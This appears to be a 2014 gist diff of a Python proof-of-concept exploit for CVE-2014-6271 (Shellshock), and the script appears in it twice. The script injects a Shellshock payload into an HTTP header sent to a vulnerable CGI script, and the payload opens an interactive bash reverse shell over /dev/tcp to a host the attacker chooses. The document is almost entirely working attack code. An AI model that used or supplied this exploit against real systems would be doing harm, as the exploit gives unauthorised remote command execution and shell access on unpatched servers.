metahertz · September 25, 2014 01:24
diff --git a/gistfile1.txt b/gistfile1.txt

 #
 # Reverse shell using bash and /dev/tcp 
 # PoC for CVE-2014-6271 BASH RCE
 #
 
 import httplib,urllib,sys
 
 if (len(sys.argv)<4):
        print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
        print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
        exit(0)
 
 conn = httplib.HTTPConnection(sys.argv[1])
 reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
 
 headers = {"Content-type": "application/x-www-form-urlencoded",
        "test":reverse_shell }
 conn.request("GET",sys.argv[2],headers=headers)
 res = conn.getresponse()
 print res.status, res.reason
 data = res.read()
 print data

	#
	# Reverse shell using bash and /dev/tcp
	# PoC for CVE-2014-6271 BASH RCE
	#

	import httplib,urllib,sys

	if (len(sys.argv)<4):
	print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
	print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
	exit(0)

	conn = httplib.HTTPConnection(sys.argv[1])
	reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

	headers = {"Content-type": "application/x-www-form-urlencoded",
	"test":reverse_shell }
	conn.request("GET",sys.argv[2],headers=headers)
	res = conn.getresponse()
	print res.status, res.reason
	data = res.read()
	print data